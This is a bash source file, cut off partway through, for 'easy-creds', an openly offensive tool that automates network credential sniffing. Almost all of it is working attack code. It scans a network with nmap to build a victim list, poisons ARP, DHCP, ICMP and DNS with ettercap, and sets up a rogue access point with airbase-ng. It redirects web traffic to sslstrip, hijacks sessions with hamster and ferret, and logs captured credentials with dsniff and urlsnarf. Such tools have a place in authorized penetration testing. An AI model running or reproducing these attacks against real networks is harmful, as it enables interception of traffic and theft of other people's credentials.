#!/bin/bash ################################################################################################################## # easy-creds is a simple bash script which makes sniffing networks for credentials a little easier. # # # # J0hnnyBrav0 (@Brav0hax) with help from al14s (@al14s) and Zero_Chaos # ################################################################################################################## # v3.8-dev Garden of New Jersey - rolling # # Copyright (C) 2013 Eric Milam # This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public # License as published by the Free Software Foundation; either version 2 of the License, or any later version. # # This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied # warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along with this program; if not, write to the # Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. ################################################################################################################## # #Clear some variables unset wireless unset etterlaunch unset offset unset eviltwin unset vercompare unset dosattack unset karmasploit unset x unset y #Save the starting location path location=${PWD} #Create the log folder in PWD if [ -z ${1} ]; then logfldr=${PWD}/easy-creds-$(date +%F-%H%M) mkdir -p ${logfldr} else logfldr=${1} fi # Catch ctrl-c input from user trap f_Quit 2 # # MISCELLANEOUS FUNCTIONS # ################################################## f_isxrunning(){ # Check to see if X is running if [ -z $(pidof X) ] && [ -z $(pidof Xorg) ]; then isxrunning= else isxrunning=1 fi # Uncomment the following line to launch attacks in a screen session instead of an xterm window. #unset isxrunning if [ -z ${isxrunning} ]; then echo -e "\n\e[1;31m[-]\e[0m Your attack will be launched in screen\n" sleep 2 fi } ################################################## f_prereq_check(){ #This function will check for the necessary prereqs, all MUST be in $PATH to run properly app_prereqs="screen radiusd hamster ferret sslstrip dsniff urlsnarf msfconsole airbase-ng airodump-ng hostapd mdk3 ipcalc asleap" for apps in ${app_prereqs}; do if [ -z "$(find /usr/bin| grep ${apps})" ] && [ -z "$(find /usr/local/sbin/|grep ${apps})" ] && [ -z "$(find /usr/sbin/|grep ${apps})" ]; then echo -e "\e[1;31m[!]\e[0m Couldn't find ${apps}. If its installed please create a symbolic link in /usr/bin" prereq_error=1 fi done if [ ! -z ${prereq_error} ]; then echo -e "\n\e[1;31m[!]\e[0m Some prereqs missing, functionality may be impaired. Review README file." sleep 10 fi app_prereqs= #unset the variable } ################################################## f_xtermwindows(){ x="0" # x offset value y="0" # y offset value width="100" # width value height="7" # height value yoffset="120" # y offset } ################################################## f_checkexit(){ if [ -z ${clean} ]; then f_Quit else if [[ -z $(ls ${logfldr}) ]];then rm -rf ${logfldr}; fi rm -rf /tmp/ec &> /dev/null clear exit 2> /dev/null fi } ################################################## f_Quit(){ echo -e "\n\e[1;34m[*]\e[0m Please standby while we clean up your mess...\n" sleep 2 # The following will run regardless of attack selected if [ -s /tmp/ec/tail.pid ]; then kill $(cat /tmp/ec/tail.pid); fi if [ -s /tmp/ec/sslstrip.pid ]; then kill $(cat /tmp/ec/sslstrip.pid); fi if [ ! -z "$(pidof hamster)" ]; then kill $(pidof hamster); fi if [ ! -z "$(pidof ferret)" ]; then kill $(pidof ferret); fi if [ ! -z "$(pidof ettercap)" ]; then kill $(pidof ettercap); fi if [ ! -z "$(pidof urlsnarf)" ]; then kill $(pidof urlsnarf); fi if [ ! -z "$(pidof dsniff)" ]; then kill $(pidof dsniff); fi echo "0" > /proc/sys/net/ipv4/ip_forward if [ -z "$(ls ${logfldr})" ];then rm -rf ${logfldr}; fi # The following will run for wireless AP attacks if [ ! -z ${wireless} ]; then kill $(pidof airbase-ng) if [ -s /tmp/ec/sleep.pid ]; then kill $(cat /tmp/ec/sleep.pid); fi if [ -s /var/run/dhcpd.pid ]; then kill $(cat /var/run/dhcpd.pid); fi if [ -s /var/run/dhcp3-server/dhcpd.pid ]; then kill $(cat /var/run/dhcp3-server/dhcpd.pid); fi iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain airmon-ng stop ${MONMODE} &> /dev/null fi # The following will run for wireless AP DoS attacks if [ ! -z ${dosattack} ] ; then if [ -s /tmp/ec/dosap.pid ]; then kill $(cat /tmp/ec/dosap.pid); fi airmon-ng stop ${dosmon} &> /dev/null airmon-ng stop ${airomon} &> /dev/null fi # The following will run for the Karmetasploit attack if [ ! -z ${karmasploit} ] ; then kill $(cat /tmp/ec/ec-karma.pid) &> /dev/null kill $(cat /tmp/ec/ec-metasploit.pid) &> /dev/null fi # The following will run for wireless Free Radius attacks if [ ! -z ${fra} ]; then kill $(pidof radiusd) &> /dev/null kill $(pidof hostapd) &> /dev/null if [ -s /tmp/ec/tshark.pid ]; then kill $(cat /tmp/ec/tshark.pid);fi echo "" > ${freeradiuslog} fi # Final portion to clean up and quit current attack or exit if [ "${mainchoice}" == "5" ]; then clear rm -rf /tmp/ec exit 2> /dev/null fi rm -rf /tmp/ec bash ${0} ${logfldr} kill $$ 2> /dev/null clean=1 } ################################################## # # PREREQ AND CONFIGURATION FUNCTIONS # ################################################## f_addtunnel(){ #Check differnet paths based on install if [ -e /etc/default/isc-dhcp-server ]; then dhcp_tunnel_add=/etc/default/isc-dhcp-server elif [ -e /etc/sysconfig/dhcpd ]; then dhcp_tunnel_add=/etc/sysconfig/dhcpd elif [ -e /etc/default/dhcp3-server ]; then dhcp_tunnel_add=/etc/default/dhcp3-server else echo -e "\e[1;31m[-]\e[0m I can't find the proper file. Ensure a dhcp server is installed." sleep 3 f_prereqs fi if [ -z ${isxrunning} ];then nano ${dhcp_tunnel_add} else xterm -bg blue -fg white -geometry 90x25 -T "Add dhcpd Interface" -e nano ${dhcp_tunnel_add} & fi f_prereqs } ################################################## f_nanoetter(){ #ettercap source install if [ -e /etc/ettercap/etter.conf ]; then etter_conf_path=/etc/ettercap/etter.conf #ettercap repo package install elif [ -e /etc/etter.conf ];then etter_conf_path=/etc/etter.conf else echo -e "\e[1;31m[-]\e[0m I can't find the etter.conf file" sleep 3 f_prereqs fi if [ -z ${isxrunning} ];then nano ${etter_conf_path} else xterm -bg blue -fg white -geometry 125x100-0+0 -T "Edit Etter Conf" -e nano ${etter_conf_path} & fi f_prereqs } ################################################## f_nanoetterdns(){ #ettercap source install if [ -e /usr/local/share/ettercap/etter.dns ]; then etter_dns_path=/usr/local/share/ettercap/etter.dns #ettercap repo package install elif [ -e /usr/share/ettercap/etter.dns ];then etter_dns_path=/usr/share/ettercap/etter.dns elif [ -e /etc/ettercap/etter.dns ];then etter_dns_path=/etc/ettercap/etter.dns else echo -e "\n\e[1;31m[-]\e[0m I can't find the etter.dns file" sleep 3 f_prereqs fi if [ -z ${isxrunning} ];then nano ${etter_dns_path} else xterm -bg blue -fg white -geometry 125x100-0+0 -T "Edit Etter DNS" -e nano ${etter_dns_path} & fi f_prereqs } ################################################## f_dhcp_server_install(){ clear f_Banner echo -e "\e[1;34m[*]\e[0m Installing dhcp server, please stand by.\n" if [ -e /etc/lsb-release ] || [ -e /etc/issue ]; then which_dhcp_server=$(apt-cache search isc-dhcp-server) if [ -z "${which_dhcp_server}" ]; then apt-get update && apt-get install -y dhcp3-server &> /dev/null else apt-get update && apt-get install -y isc-dhcp-server &> /dev/null fi elif [ -e /etc/redhat-release ]; then yum install dhcp* &> /dev/null else echo -e "\e[1;31m[-]\e[0m I can't determine your OS, please install dhcp server manually" fi echo -e "\n\e[1;32m[+]\e[0m Finished installing dhcp server.\n" sleep 3 f_prereqs } ################################################## f_karmareqs(){ clear f_Banner echo -e "\e[1;34m[*]\e[0m Installing Karmetasploit Prerequisites, please standby.\n" gem install activerecord echo -e "\n\e[1;32m[+]\e[0m Finished installing Karmetasploit Prerequisites.\n" sleep 3 f_prereqs } ################################################## f_msfupdate(){ clear f_Banner echo -e "\e[1;34m[*]\e[0m Updating the Metasploit Framework, please stand by.\n" msfupdate echo -e "\n\e[1;32m[+]\e[0m Finished updating the Metasploit Framework.\n" sleep 3 f_prereqs } ################################################## f_aircrackupdate(){ clear f_Banner echo -e "\n\e[1;34m[*]\e[0m Updating aircrack-ng from SVN, please be patient..." svn co http://trac.aircrack-ng.org/svn/trunk/ /tmp/ec/aircrack-ng cd /tmp/ec/aircrack-ng/ make && make install > /dev/null echo -e "\n\e[1;32m[+]\e[0m Finished updating Aircrack.\n" sleep 2 echo -e "\e[1;34m[*]\e[0m Updating airodump-ng OUI.\n" bash airodump-ng-oui-update > /dev/null echo -e "\e[1;32m[+]\e[0m Finished updating airodump-ng OUI.\n" sleep 3 cd ${location} f_prereqs } ################################################## f_howtos(){ xdg-open http://www.youtube.com/user/Brav0Hax/videos f_prereqs } ################################################## f_pbs(){ xdg-open http://www.youtube.com/watch?v=OFzXaFbxDcM f_mainmenu } ################################################## # # POISONING ATTACK FUNCTIONS # ################################################## f_getvics(){ read -p "Do you have a populated file of victims to use? [y/N]: " VICFILE if [ "$(echo ${VICFILE} | tr 'A-Z' 'a-z')" == "y" ]; then VICLIST= p= if [ -e /tmp/victims ]; then p="[/tmp/victims]"; fi while [ -z ${VICLIST} ]; do read -e -p "Path to the victim list file $p : " VICLIST if [ -z ${VICLIST} ] && [ -n ${p} ]; then VICLIST="/tmp/victims"; fi done else VICS= while [ -z ${VICS} ]; do read -p "IP address or range of IPs to poison (ettercap format): " VICS; done fi GW= p=$(route | grep default | awk '{print $2}') while [ -z ${GW} ]; do read -p "IP address of the gateway [${p}] : " GW if [ -z ${GW} ];then GW=${p}; fi done f_whichettercap } ################################################## f_whichettercap(){ if [ "${VICFILE}" == "y" ]; then case ${poisoningchoice} in 2) etterlaunch=1 ;; 3) etterlaunch=3 ;; 5) etterlaunch=8 ;; esac else case ${poisoningchoice} in 2) etterlaunch=2 ;; 3) etterlaunch=4 ;; 5) etterlaunch=9 ;; esac fi } ################################################## f_HostScan(){ # ARP scan of segment with nmap and creates victim file in /tmp clear f_Banner unset range while [ -z "${range}" ]; do read -p "Enter your target network range (nmap format): " range; f_validaterange;done echo -e "Performing an ARP scan to identify live devices - excluding our IPs.\n\nThis may take a bit." #take our addresses out of the mix myaddrs=$(printf "%s," $(ifconfig | grep "inet" | grep -v "127.0.0.1" | awk '{print $2}' | sed 's/addr://g')) nmap -PR -n -sn ${range} --exclude ${myaddrs} -oN /tmp/ec/nmap.scan grep -e report -e MAC /tmp/ec/nmap.scan | sed '{ N; s/\n/ /; s/Nmap scan report for //g; s/MAC Address: //g; s/ (.\+//g; s/$/ -/; }' > /tmp/victims echo -e "\n\e[1;34m[*]\e[0m Your victim host list is at /tmp/victims." echo -e "\e[1;31m[-]\e[0m Remember to remove any IPs that should not be poisoned! (HSRP Physical NICs)\n" read -p "Would you like to edit the victim host list? [y/N] : " yn if [ $(echo ${yn} | tr 'A-Z' 'a-z') == "y" ]; then if [ -z ${isxrunning} ];then nano /tmp/victims else xterm -bg blue -fg white -geometry 125x100-0+0 -T "Edit Victims List" -e nano /tmp/victims & fi fi f_poisoning } ################################################## f_validaterange(){ # added nmap format validation - use of subnets (ex. 192.168.0.0/24), stars (ex. 192.168.*.*), and split ranges (ex. 192.168.1.1-10,14) now accepted. if [ -z $(echo "${range}" | grep -E '^((25[0-4]{1}|2[0-4]{1}[0-9]{1}|1[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]{1}){1}([-,](25[0-4]{1}|2[0-4]{1}[0-9]{1}|1[0-9]{2}|[1-9]{1}[0-9]{1}|[1-9]{1}){1}){0,}|\*)\.(((25[0-4]{1}|2[0-4]{1}[0-9]{1}|1[0-9]{2}|[1-9]{0,1}[0-9]{1}){1}([-,](25[0-4]{1}|2[0-4]{1}[0-9]{1}|1[0-9]{2}|[1-9]{0,1}[0-9]{1}){1}){0,}|\*)\.){2}((25[0-4]{1}|2[0-4]{1}[0-9]{1}|1[0-9]{2}|[1-9]{0,1}[0-9]{1}){1}([-,](25[0-4]{1}|2[0-4]{1}[0-9]{1}|1[0-9]{2}|[1-9]{0,1}[0-9]{1}){1}){0,}|\*|([0]{1}\/(8|9|[1-2]{1}[0-9]{1}|30|31|32){1})){1}$' | grep -v -E '([-][0-9]{1,3}[-])|(([,-].*[/]|[/].*[,-])|([*].*[/]|[/].*[*]))') ]; then unset range else range=$(echo ${range}) fi } ################################################## f_setup(){ echo -e "Network Interfaces:\n" ifconfig | awk '/Link encap:Eth/ {print;getline;print}' | sed '{ N; s/\n/ /; s/Link en.*.HWaddr//g; s/ Bcast.*//g; s/UP.*.:1//g; s/inet addr/IP/g; }' | sed '$a\\n' unset IFACE while [ -z ${IFACE} ]; do read -p "Interface connected to the network (ex. eth0): " IFACE done echo -e "\n\e[1;34m[*]\e[0m Setting up iptables to handle traffic routing...\n" iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o ${IFACE} -j MASQUERADE iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 sleep 3 f_xtermwindows } ################################################## f_Standard(){ clear f_Banner f_setup f_getvics f_finalstage f_mainmenu } ################################################## f_Oneway(){ clear f_Banner f_setup f_getvics f_finalstage f_mainmenu } ################################################## f_DHCPPoison(){ clear f_Banner f_setup etterlaunch=5 unset POOL while [ -z "${POOL}" ]; do read -p "Pool of IP address to assign to your victims: " POOL; done unset MASK while [ -z "${MASK}" ]; do read -p "Netmask to assign to your victims: " MASK; done unset DNS while [ -z "${DNS}" ]; do read -p "DNS IP to assign to your victims: " DNS; done f_finalstage f_mainmenu } ################################################## f_DNSPoison(){ clear f_Banner f_setup f_getvics f_finalstage f_mainmenu } ################################################## f_ICMPPoison(){ clear f_Banner f_setup etterlaunch=6 unset GATEMAC while [ -z "${GATEMAC}" ]; do read -p "MAC address of the gateway: " GATEMAC; done unset GATEIP while [ -z "${GATEIP}" ]; do read -p "IP address of the gateway: " GATEIP; done f_finalstage f_mainmenu } ################################################## f_sidejack(){ echo -e "\n\e[1;34m[*]\e[0m Starting Hamster & Ferret..." cd ${logfldr} screen -dmS SideJack -t Ferret bash -c "ferret -i ${IFACE}" sleep 2 screen -S SideJack -X screen -t Hamster hamster cd ${location} sleep 2 echo -e "\n\e[1;34m[*]\e[0m Run browser and type http://hamster\n" echo -e "\e[1;34m[*]\e[0m Don't forget to set the proxy to 127.0.0.1:1234" sleep 5 } ################################################## f_ecap(){ unset etter_conf_path #ettercap source install if [ -e /etc/ettercap/etter.conf ]; then etter_conf_path=/etc/ettercap/etter.conf #ettercap repo package install elif [ -e /etc/etter.conf ];then etter_conf_path=/etc/etter.conf fi echo -e "\e[1;34m[*]\e[0m Launching ettercap, poisoning specified hosts." y=$(($y+$yoffset)) case ${etterlaunch} in 1) type="[arp:remote]" c="ettercap -a ${etter_conf_path} -M arp:remote -T -j ${VICLIST} -q -l ${logfldr}/ettercap$(date +%F-%H%M) -i ${IFACE} /${GW}/ //" ;; 2) type="[arp:remote]" c="ettercap -a ${etter_conf_path} -M arp:remote -T -q -l ${logfldr}/ettercap$(date +%F-%H%M) -i ${IFACE} /${GW}/ /${VICS}/" ;; 3) type="[arp:oneway]" c="ettercap -a ${etter_conf_path} -M arp:oneway -T -j ${VICLIST} -q -l ${logfldr}/ettercap$(date +%F-%H%M) -i ${IFACE} // /${GW}/" ;; 4) type="[arp:oneway]" c="ettercap -a ${etter_conf_path} -M arp:oneway -T -q -l ${logfldr}/ettercap$(date +%F-%H%M) -i ${IFACE} /${VICS}/ /${GW}/" ;; 5) type="[dhcp:${POOL}/${MASK}/${DNS}/]" c="ettercap -a ${etter_conf_path} -T -q -l ${logfldr}/ettercap$(date +%F-%H%M) -i ${IFACE} -M dhcp:${POOL}/${MASK}/${DNS}/" ;; 6) type="[icmp:${GATEMAC}/${GATEIP}]" c="ettercap -a ${etter_conf_path} -T -q -l ${logfldr}/ettercap$(date +%F-%H%M) -i ${IFACE} -M icmp:${GATEMAC}/${GATEIP}" ;; 7) type="[tunnel]" c="ettercap -a ${etter_conf_path} -T -q -l ${logfldr}/ettercap$(date +%F-%H%M) -i ${TUNIFACE} // //" ;; 8) type="[dns_spoof:arp]" c="ettercap -a ${etter_conf_path} -P dns_spoof -M arp -T -j ${VICLIST} -q -l ${logfldr}/ettercap$(date +%F-%H%M) -i ${IFACE} /${GW}/ //" ;; 9) type="[dns_spoof:arp]" c="ettercap -a ${etter_conf_path} -P dns_spoof -M arp -T -q -l ${logfldr}/ettercap$(date +%F-%H%M) -i ${IFACE} /${GW}/ /${VICS}/" ;; esac if [ ! -z ${isxrunning} ]; then xterm -geometry "${width}"x${height}-${x}+${y} -T "Ettercap - $type" -l -lf ${logfldr}/ettercap$(date +%F-%H%M).txt -bg white -fg black -e ${c} & else screen -S easy-creds -X screen -t "Ettercap-$type" ${c} fi ecpid=$(pidof ettercap) } ################################################## # # FAKE AP ATTACK FUNCTIONS # ################################################## f_fakeapAttack(){ wireless=1 offset=1 clear f_Banner f_xtermwindows unset SIDEJACK read -p "Would you like to include a sidejacking attack? [y/N]: " SIDEJACK SIDEJACK="$(echo ${SIDEJACK} | tr 'A-Z' 'a-z')" echo -e "Network Interfaces:\n" ifconfig | awk '/Link encap:Eth/ {print;getline;print}' | sed '{ N; s/\n/ /; s/Link en.*.HWaddr//g; s/ Bcast.*//g; s/UP.*.:1//g; s/inet addr/IP/g; }' | sed '$a\\n' unset IFACE while [ -z "${IFACE}" ]; do read -p "Interface connected to the internet (ex. eth0): " IFACE; done wirelesscheck=$(airmon-ng | grep 'wlan') if [ ! -z "${wirelesscheck}" ]; then airmon-ng else echo -e "\n\e[1;31m[-]\e[0m I can't find a wireless interface to display...continuing anyway\n" sleep 5 fi unset WIFACE while [ -z "${WIFACE}" ]; do read -p "Wireless interface name (ex. wlan0): " WIFACE; done if [ "${eviltwin}" == "1" ]; then airmon-ng start ${WIFACE} &> /dev/null else unset ESSID while [ -z "${ESSID}" ]; do read -p "ESSID you would like your rogue AP to be called, example FreeWiFi: " ESSID; done unset CHAN while [ -z "${CHAN}" ]; do read -p "Channel you would like to broadcast on: " CHAN; done airmon-ng start ${WIFACE} ${CHAN} &> /dev/null fi modprobe tun echo -e "\n\e[1;34m[*]\e[0m Your interface has now been placed in Monitor Mode\n" airmon-ng | grep mon | sed '$a\\n' unset MONMODE while [ -z "${MONMODE}" ]; do read -p "Enter your monitor enabled interface name, (ex: mon0): " MONMODE; done if [ ! -z "$(find /usr/bin/ | grep macchanger)" ] || [ ! -z "$(find /usr/local/bin | grep macchanger)" ]; then f_macchanger fi unset TUNIFACE while [ -z "${TUNIFACE}" ]; do read -p "Enter your tunnel interface, example at0: " TUNIFACE; done read -p "Do you have a dhcpd.conf file to use? [y/N]: " DHCPFILE DHCPFILE=$(echo ${DHCPFILE} | tr 'A-Z' 'a-z') if [ "${DHCPFILE}" == "y" ]; then f_dhcpconf else f_dhcpmanual fi f_dhcptunnel } ################################################## f_macchanger(){ unset macvar read -p "Would you like to change your MAC address on the mon interface? [y/N]: " macvar mac_answer=$(echo ${macvar} | tr '[:upper:]' '[:lower:]') unset random_mac unset ap_mac if [ "${mac_answer}" == "y" ]; then while [ -z "${random_mac}" ]; do read -p "Would like to have a random MAC address generated or manually input? [r/m]: " random_mac; done case ${random_mac} in r|R) ifconfig ${MONMODE} down && macchanger -A ${MONMODE} && ifconfig ${MONMODE} up;; m|M) while [ -z "${ap_mac}" ];do read -p "Desired MAC address for ${MONMODE}?: " ap_mac;done ; f_mac_manual ;; *) unset random_mac esac sleep 2 fi } ################################################## f_mac_manual(){ if [ -z $(echo ${ap_mac} | sed -n "/^\([0-9A-Z][0-9A-Z]:\)\{5\}[0-9A-Z][0-9A-Z]$/p") ]; then echo -e "\n\e[1;31m[-]\e[0m Invalid MAC address format" sleep 2 f_macchanger else ifconfig ${MONMODE} down && macchanger -m ${ap_mac} ${MONMODE} && ifconfig ${MONMODE} up fi } ################################################## f_dhcpconf(){ unset dhcpdconf if [ -e /etc/dhcp3/dhcpd.conf ]; then #Ubuntu/Debian dhcp3-server dhcpdconf="/etc/dhcp3/dhcpd.conf" elif [ -e /etc/dhcpd.conf ]; then #redhat/fedora old dhcpdconf="/etc/dhcpd.conf" else dhcpdconf="/etc/dhcp/dhcpd.conf" #Ubuntu/Debian/RH/Fedora isc-dhcp-server fi unset valid while [[ ${valid} != 1 ]]; do read -e -p "Path to the dhcpd.conf file [$dhcpdconf]: " DHCPPATH if [ -z "${DHCPPATH}" ]; then DHCPPATH=${dhcpdconf}; fi if [ ! -f "${DHCPPATH}" ]; then echo -e "File not found - ${DHCPPATH}\n" else valid=1 fi done cat ${DHCPPATH} > /tmp/ec/dhcpd.conf mv /tmp/ec/dhcpd.conf ${dhcpdconf} DHCPPATH=${dhcpdconf} #If your DHCP conf file is setup properly, this will work, otherwise you need to tweak it ATNET=$(cat ${DHCPPATH} |grep -i subnet|cut -d" " -f2) ATIP=$(cat ${DHCPPATH} |grep -i "option routers"|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}') ATSUB=$(cat ${DHCPPATH} |grep -i subnet|cut -d" " -f4) ATCIDR=$(ipcalc -b ${ATNET}/${ATSUB}|grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\/[0-9]\{1,2\}') } ################################################## f_ipcalc(){ unset dhcpdconf if [ -e /etc/dhcp3/dhcpd.conf ]; then dhcpdconf="/etc/dhcp3/dhcpd.conf" elif [ -e /etc/sysconfig/dhcpd ]; then dhcpdconf="/etc/dhcpd.conf" else dhcpdconf="/etc/dhcp/dhcpd.conf" fi DHCPPATH=${dhcpdconf} #use ipcalc to complete the DHCP setup ipcalc "${ATCIDR}" > /tmp/ec/atcidr ATNET=$(cat /tmp/ec/atcidr|grep Address| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}') ATIP=$(cat /tmp/ec/atcidr|grep HostMin| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}') ATSUB=$(cat /tmp/ec/atcidr|grep Netmask| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}') ATBROAD=$(cat /tmp/ec/atcidr|grep Broadcast| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}') ATLSTARTTMP=$(cat /tmp/ec/atcidr|grep HostMin| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|cut -d"." -f1-3) ATLSTART=$(echo ${ATLSTARTTMP}.100) ATLENDTMP=$(cat /tmp/ec/atcidr|grep HostMax| grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'|cut -d"." -f1-3) ATLEND=$(echo ${ATLENDTMP}.200) echo -e "\n\e[1;34m[*]\e[0m Creating a dhcpd.conf to assign addresses to clients that connect to us." cat <<-EOF > ${DHCPPATH} ddns-update-style none; authoritative; log-facility local7; subnet ${ATNET} netmask ${ATSUB} { range ${ATLSTART} ${ATLEND}; option domain-name-servers ${ATDNS}; option routers ${ATIP}; option broadcast-address ${ATBROAD}; default-lease-time 600; max-lease-time 7200; } EOF } ################################################## f_dhcpmanual(){ unset ATCIDR while [ -z "${ATCIDR}" ]; do read -p "Network range for your tunneled interface, example 10.0.0.0/24: " ATCIDR if [[ ! ${ATCIDR} =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/[0-9]{1,2}$ ]]; then ATCIDR=; fi done unset ATDNS while [ -z "${ATDNS}" ]; do read -p "Enter the IP address for the DNS server, example 8.8.8.8: " ATDNS; done f_ipcalc } ################################################## f_dhcptunnel(){ etterlaunch=7 # airbase-ng is going to create our fake AP with the SSID we specified echo -e "\e[1;34m[*]\e[0m Launching Airbase with your settings." if [ "${eviltwin}" == "1" ] && [ -z ${isxrunning} ]; then screen -dmS easy-creds -t Airbase-NG airbase-ng -P -C 30 -e "${ESSID}" -v ${MONMODE} elif [ "${eviltwin}" == "1" ] && [ ! -z ${isxrunning} ]; then xterm -geometry "${width}"x${height}-${x}+${y} -T "Airbase-NG" -e airbase-ng -P -C 30 -e "${ESSID}" -v ${MONMODE} & elif [ -z ${isxrunning} ]; then screen -dmS easy-creds -t Airbasg-NG airbase-ng -e "${ESSID}" -c "${CHAN}" ${MONMODE} else xterm -geometry ${width}x${height}-${x}+${y} -T "Airbase-NG" -e airbase-ng -e "${ESSID}" -c "${CHAN}" ${MONMODE} & fi sleep 7 echo -e "\e[1;34m[*]\e[0m Configuring tunneled interface." ifconfig "${TUNIFACE}" up ifconfig "${TUNIFACE}" "${ATIP}" netmask "${ATSUB}" ifconfig "${TUNIFACE}" mtu 1500 route add -net "${ATNET}" netmask "${ATSUB}" gw "${ATIP}" dev "${TUNIFACE}" sleep 2 echo -e "\e[1;34m[*]\e[0m Setting up iptables to handle traffic seen by the tunneled interface." iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o ${IFACE} -j MASQUERADE iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 sleep 2 echo -e "\e[1;34m[*]\e[0m Launching Tail." if [ -z ${isxrunning} ]; then screen -S easy-creds -X screen -t DMESG tail -f /var/log/messages else y=$((${y}+${yoffset})) xterm -geometry "${width}"x${height}-${x}+${y} -T "DMESG" -bg black -fg red -e tail -f /var/log/messages & fi sleep 2 #Get the PID so we can kill it when the user quits the attack ps ax|grep tail|grep -v grep|grep -v xterm|cut -d " " -f1 > /tmp/ec/tail.pid if [ -z "$(cat /tmp/ec/tail.pid)" ]; then ps ax|grep tail|grep -v grep|grep -v xterm|cut -d " " -f2 > /tmp/ec/tail.pid; fi echo -e "\e[1;34m[*]\e[0m DHCP server starting on tunneled interface." if [ -e /etc/dhcp3/dhcpd.conf ]; then dhcpd -q -cf $DHCPPATH -pf /var/run/dhcp3-server/dhcpd.pid $TUNIFACE & elif [ -e /etc/sysconfig/dhcpd ]; then systemctl start dhcpd.service else service isc-dhcp-server start fi sleep 2 f_finalstage f_mainmenu } ################################################## f_finalstage(){ if [ -z ${wireless} ]; then read -p "Would you like to include a sidejacking attack? [y/N]: " SIDEJACK SIDEJACK="$(echo ${SIDEJACK} | tr 'A-Z' 'a-z')" fi if [ "${etterlaunch}" -lt "8" ];then echo -e "\e[1;34m[*]\e[0m Launching SSLStrip..." sslstripfilename=sslstrip$(date +%F-%H%M).log if [ "${wireless}" == "1" ] && [ -z ${isxrunning} ]; then screen -S easy-creds -X screen -t sslstrip sslstrip -pfk -w ${logfldr}/${sslstripfilename} elif [ -z ${wireless} ] && [ -z ${isxrunning} ]; then screen -dmS easy-creds -t sslstrip sslstrip -pfk -w ${logfldr}/${sslstripfilename} elif [ "$offset" == "1" ]; then y=$((${y}+${yoffset})) xterm -geometry "${width}"x${height}-${x}+${y} -bg blue -fg white -T "SSLStrip" -e sslstrip -pfk -w ${logfldr}/${sslstripfilename} & else xterm -geometry "${width}"x${height}-${x}+${y} -bg blue -fg white -T "SSLStrip" -e sslstrip -pfk -w ${logfldr}/${sslstripfilename} & fi fi sleep 2 #Get the PID so we can kill it when the user quits the attack ps ax|grep sslstrip|grep -v grep|grep -v xterm|cut -d " " -f1 > /tmp/ec/sslstrip.pid if [ -z $(cat /tmp/ec/sslstrip.pid) ]; then ps ax|grep sslstrip|grep -v grep|grep -v xterm|cut -d " " -f2 > /tmp/ec/sslstrip.pid; fi #Launch ettercap f_ecap sleep 3 echo -e "\e[1;34m[*]\e[0m Configuring IP forwarding..." echo "1" > /proc/sys/net/ipv4/ip_forward sleep 3 echo -e "\e[1;34m[*]\e[0m Launching URLSnarf..." if [ "${wireless}" == "1" ] && [ -z ${isxrunning} ]; then screen -S easy-creds -X screen -t URL-Snarf urlsnarf -i ${TUNIFACE} screen -S easy-creds -p urlsnarf -X logfile ${logfldr}/urlsnarf-$(date +%F-%H%M).txt screen -S easy-creds -p urlsnarf -X log elif [ "${wireless}" == "1" ]; then y=$((${y}+${yoffset})) xterm -geometry "${width}"x${height}-${x}+${y} -T "URL Snarf" -l -lf ${logfldr}/urlsnarf-$(date +%F-%H%M).txt -bg black -fg green -e urlsnarf -i ${TUNIFACE} & sleep 3 elif [ -z ${wireless} ] && [ -z ${isxrunning} ]; then screen -S easy-creds -X screen -t URL-Snarf urlsnarf -i ${IFACE} screen -S easy-creds -p urlsnarf -X logfile ${logfldr}/urlsnarf-$(date +%F-%H%M).txt screen -S easy-creds -p urlsnarf -X log else y=$((${y}+${yoffset})) xterm -geometry "${width}"x${height}-${x}+${y} -T "URL Snarf" -l -lf ${logfldr}/urlsnarf-$(date +%F-%H%M).txt -bg black -fg green -e urlsnarf -i ${IFACE} & sleep 3 fi echo -e "\e[1;34m[*]\e[0m Launching Dsniff..." if [ "${wireless}" == "1" ] && [ -z ${isxrunning} ]; then screen -S easy-creds -X screen -t dsniff dsniff -m -i ${TUNIFACE} -w ${logfldr}/dsniff$(date +%F-%H%M).log elif [ "$wireless" == "1" ]; then y=$((${y}+${yoffset})) xterm -geometry "${width}"x${height}-${x}+${y} -T "Dsniff" -bg blue -fg white -e dsniff -m -i ${TUNIFACE} -w ${logfldr}/dsniff$(date +%F-%H%M).log & sleep 3 elif [ -z ${wireless} ] && [ -z ${isxrunning} ]; then screen -S easy-creds -X screen -t dsniff dsniff -m -i ${IFACE} -w ${logfldr}/dsniff$(date +%F-%H%M).log else y=$((${y}+${yoffset})) xterm -geometry "${width}"x${height}-${x}+${y} -T "Dsniff" -bg blue -fg white -e dsniff -m -i ${IFACE} -w ${logfldr}/dsniff$(date +%F-%H%M).log & sleep 3 